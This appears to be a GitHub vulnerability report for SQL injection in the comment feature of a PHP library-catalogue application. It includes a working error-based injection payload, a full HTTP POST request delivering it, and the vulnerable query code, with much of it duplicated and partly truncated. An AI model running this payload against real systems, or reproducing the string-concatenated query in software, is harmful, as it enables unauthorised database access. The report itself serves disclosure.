You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
Ordinary user login "find a book" SQL injection attack in the comments (example:'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1
)
`SQL Injection request:
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close
`Vulnerable code:
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
LEFT JOIN member AS m ON m.member_id = c.member_id
WHERE b.biblio_id =".$_detail_id.
"ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
$_all_recs = $commlist->num_rows;
}
if ($_all_recs >0) {
$_page = ($page -1) * $_recs_each_page;
$_sql .= "Limit". $_page. ", ". $_recs_each_page;
$commlist = $dbs->query($_sql);
$_list_comment .='
'. $_all_recs. __(' comments available').'
';
while ($_data = $commlist->fetch_assoc()) {
$_list_comment .='
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
![5](https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png)
![6](https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png)
Ordinary user login "find a book" SQL injection attack in the comments (example:
'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1
)
`SQL Injection request:
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close
comment='and//1=(updatexml(1,concat(0x3a,(select//user())),1))//and//'1'='1
&SaveComment=Save+comment`
`Vulnerable code:
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
LEFT JOIN member AS m ON m.member_id = c.member_id
WHERE b.biblio_id =".$_detail_id.
"ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
$_all_recs = $commlist->num_rows;
}
if ($_all_recs >0) {
$_page = ($page -1) * $_recs_each_page;
$_sql .= "Limit". $_page. ", ". $_recs_each_page;
$commlist = $dbs->query($_sql);
$_list_comment .='
while ($_data = $commlist->fetch_assoc()) {
$_list_comment .='
$_list_comment .='
$_list_comment .='
$_list_comment .='
}
$_list_comment .='
}
if (ISSET($_SESSION['mid'])) {
';// Comment form
$_forms ='
$_forms .= simbio_form_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'
';
$_forms .='';
$_forms .= \Volnix\CSRF\CSRF::getHiddenInputString();
$_forms .='';
return $_list_comment.$_forms;`
The text was updated successfully, but these errors were encountered: